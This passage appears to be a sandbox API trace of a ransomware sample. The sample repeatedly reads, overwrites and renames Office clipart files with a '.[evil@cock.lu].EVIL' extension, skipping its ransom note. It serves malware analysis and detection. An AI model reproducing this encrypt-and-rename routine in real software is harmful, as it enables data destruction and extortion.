office\\root\\clipart\\pub60cor\\ph01221k.jpg.[evil@cock.lu].evil")) returned 1 [0166.767] ??_V@YAXPEAX@Z () returned 0x1 [0166.770] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH01221K.JPG", dwFileAttributes=0x200) returned 0 [0166.770] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0166.770] wcsstr (_Str="PH01235U.BMP", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0166.770] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH01235U.BMP") returned 69 [0166.771] wcscmp (_String1="PH01235U.BMP", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0166.771] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="PH01235U.BMP") returned 0x0 [0166.771] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH01235U.BMP") returned 0x45 [0166.771] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH01235U.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph01235u.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0166.773] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e21040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x7db8, lpOverlapped=0x0) returned 1 [0166.776] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0166.776] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0166.776] _errno () returned 0x84b1160840 [0166.776] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0166.776] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e21040*, nNumberOfBytesToWrite=0x7dc0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x7dc0, lpOverlapped=0x0) returned 1 [0166.776] CloseHandle (hObject=0x1a8) returned 1 [0166.776] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH01235U.BMP", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0166.777] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0166.777] __uncaught_exception () returned 0x84b1160800 [0166.777] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0166.777] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH01235U.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph01235u.bmp"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH01235U.BMP.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph01235u.bmp.[evil@cock.lu].evil")) returned 1 [0166.778] ??_V@YAXPEAX@Z () returned 0x1 [0166.781] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH01235U.BMP", dwFileAttributes=0x200) returned 0 [0166.781] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0166.782] wcsstr (_Str="PH01236U.BMP", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0166.782] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH01236U.BMP") returned 69 [0166.782] wcscmp (_String1="PH01236U.BMP", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0166.782] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="PH01236U.BMP") returned 0x0 [0166.782] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH01236U.BMP") returned 0x45 [0166.782] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH01236U.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph01236u.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0166.784] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e28040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e28040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x7ce0, lpOverlapped=0x0) returned 1 [0166.787] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0166.787] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0166.787] _errno () returned 0x84b1160840 [0166.787] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0166.787] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e28040*, nNumberOfBytesToWrite=0x7d00, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e28040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x7d00, lpOverlapped=0x0) returned 1 [0166.788] CloseHandle (hObject=0x1a8) returned 1 [0166.788] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH01236U.BMP", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0166.788] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0166.788] __uncaught_exception () returned 0x84b1160800 [0166.788] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0166.788] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH01236U.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph01236u.bmp"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH01236U.BMP.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph01236u.bmp.[evil@cock.lu].evil")) returned 1 [0166.789] ??_V@YAXPEAX@Z () returned 0x1 [0166.793] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH01236U.BMP", dwFileAttributes=0x200) returned 0 [0166.793] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0166.793] wcsstr (_Str="PH01239K.JPG", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0166.793] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH01239K.JPG") returned 69 [0166.793] wcscmp (_String1="PH01239K.JPG", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0166.793] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="PH01239K.JPG") returned 0x0 [0166.793] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH01239K.JPG") returned 0x45 [0166.793] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH01239K.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph01239k.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0166.796] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e20040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1764, lpOverlapped=0x0) returned 1 [0166.799] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0166.799] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0166.799] _errno () returned 0x84b1160840 [0166.799] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0166.799] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e20040*, nNumberOfBytesToWrite=0x1780, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1780, lpOverlapped=0x0) returned 1 [0166.799] CloseHandle (hObject=0x1a8) returned 1 [0166.799] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH01239K.JPG", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0166.799] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0166.799] __uncaught_exception () returned 0x84b1160800 [0166.799] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0166.800] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH01239K.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph01239k.jpg"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH01239K.JPG.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph01239k.jpg.[evil@cock.lu].evil")) returned 1 [0166.801] ??_V@YAXPEAX@Z () returned 0x1 [0166.804] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH01239K.JPG", dwFileAttributes=0x200) returned 0 [0166.805] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0166.805] wcsstr (_Str="PH01247U.BMP", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0166.805] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH01247U.BMP") returned 69 [0166.805] wcscmp (_String1="PH01247U.BMP", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0166.805] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="PH01247U.BMP") returned 0x0 [0166.805] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH01247U.BMP") returned 0x45 [0166.805] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH01247U.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph01247u.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0166.807] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b303f040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x7c08, lpOverlapped=0x0) returned 1 [0166.810] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0166.810] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0166.810] _errno () returned 0x84b1160840 [0166.810] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0166.810] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b303f040*, nNumberOfBytesToWrite=0x7c20, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x7c20, lpOverlapped=0x0) returned 1 [0166.810] CloseHandle (hObject=0x1a8) returned 1 [0166.810] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH01247U.BMP", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0166.811] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0166.811] __uncaught_exception () returned 0x84b1160800 [0166.811] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0166.811] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH01247U.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph01247u.bmp"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH01247U.BMP.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph01247u.bmp.[evil@cock.lu].evil")) returned 1 [0166.812] ??_V@YAXPEAX@Z () returned 0x1 [0166.815] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH01247U.BMP", dwFileAttributes=0x200) returned 0 [0166.816] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0166.816] wcsstr (_Str="PH01255G.GIF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0166.816] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH01255G.GIF") returned 69 [0166.816] wcscmp (_String1="PH01255G.GIF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0166.816] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="PH01255G.GIF") returned 0x0 [0166.816] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH01255G.GIF") returned 0x45 [0166.816] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH01255G.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph01255g.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0166.818] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2d040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2d040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1e55, lpOverlapped=0x0) returned 1 [0166.823] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0166.823] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0166.823] _errno () returned 0x84b1160840 [0166.823] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0166.823] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2d040*, nNumberOfBytesToWrite=0x1e60, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2d040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1e60, lpOverlapped=0x0) returned 1 [0166.823] CloseHandle (hObject=0x1a8) returned 1 [0166.823] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH01255G.GIF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0166.823] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0166.823] __uncaught_exception () returned 0x84b1160800 [0166.824] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0166.824] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH01255G.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph01255g.gif"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH01255G.GIF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph01255g.gif.[evil@cock.lu].evil")) returned 1 [0166.825] ??_V@YAXPEAX@Z () returned 0x1 [0166.828] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH01255G.GIF", dwFileAttributes=0x200) returned 0 [0166.828] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0166.828] wcsstr (_Str="PH01265U.BMP", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0166.828] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH01265U.BMP") returned 69 [0166.828] wcscmp (_String1="PH01265U.BMP", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0166.828] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="PH01265U.BMP") returned 0x0 [0166.828] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH01265U.BMP") returned 0x45 [0166.829] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH01265U.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph01265u.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0166.831] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2a040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x7c08, lpOverlapped=0x0) returned 1 [0166.834] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0166.834] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0166.834] _errno () returned 0x84b1160840 [0166.834] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0166.834] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2a040*, nNumberOfBytesToWrite=0x7c20, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x7c20, lpOverlapped=0x0) returned 1 [0166.834] CloseHandle (hObject=0x1a8) returned 1 [0166.834] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH01265U.BMP", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0166.835] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0166.835] __uncaught_exception () returned 0x84b1160800 [0166.835] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0166.835] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH01265U.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph01265u.bmp"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH01265U.BMP.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph01265u.bmp.[evil@cock.lu].evil")) returned 1 [0166.836] ??_V@YAXPEAX@Z () returned 0x1 [0166.840] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH01265U.BMP", dwFileAttributes=0x200) returned 0 [0166.840] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0166.840] wcsstr (_Str="PH01332U.BMP", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0166.840] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH01332U.BMP") returned 69 [0166.840] wcscmp (_String1="PH01332U.BMP", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0166.840] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="PH01332U.BMP") returned 0x0 [0166.840] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH01332U.BMP") returned 0x45 [0166.840] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH01332U.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph01332u.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0166.842] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e27040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e27040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x7db8, lpOverlapped=0x0) returned 1 [0166.845] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0166.845] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0166.845] _errno () returned 0x84b1160840 [0166.845] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0166.846] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e27040*, nNumberOfBytesToWrite=0x7dc0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e27040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x7dc0, lpOverlapped=0x0) returned 1 [0166.846] CloseHandle (hObject=0x1a8) returned 1 [0166.846] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH01332U.BMP", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0166.846] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0166.846] __uncaught_exception () returned 0x84b1160800 [0166.846] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0166.846] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH01332U.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph01332u.bmp"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH01332U.BMP.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph01332u.bmp.[evil@cock.lu].evil")) returned 1 [0166.847] ??_V@YAXPEAX@Z () returned 0x1 [0166.850] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH01332U.BMP", dwFileAttributes=0x200) returned 0 [0166.851] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0166.851] wcsstr (_Str="PH01478U.BMP", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0166.851] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH01478U.BMP") returned 69 [0166.851] wcscmp (_String1="PH01478U.BMP", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0166.851] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="PH01478U.BMP") returned 0x0 [0166.851] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH01478U.BMP") returned 0x45 [0166.851] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH01478U.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph01478u.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0166.853] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e26040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e26040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x7ce0, lpOverlapped=0x0) returned 1 [0166.855] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0166.855] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0166.855] _errno () returned 0x84b1160840 [0166.855] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0166.855] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e26040*, nNumberOfBytesToWrite=0x7d00, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e26040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x7d00, lpOverlapped=0x0) returned 1 [0166.855] CloseHandle (hObject=0x1a8) returned 1 [0166.855] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH01478U.BMP", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0166.856] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0166.856] __uncaught_exception () returned 0x84b1160800 [0166.856] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0166.856] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH01478U.BMP" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph01478u.bmp"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH01478U.BMP.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph01478u.bmp.[evil@cock.lu].evil")) returned 1 [0166.857] ??_V@YAXPEAX@Z () returned 0x1 [0166.859] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH01478U.BMP", dwFileAttributes=0x200) returned 0 [0166.860] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) 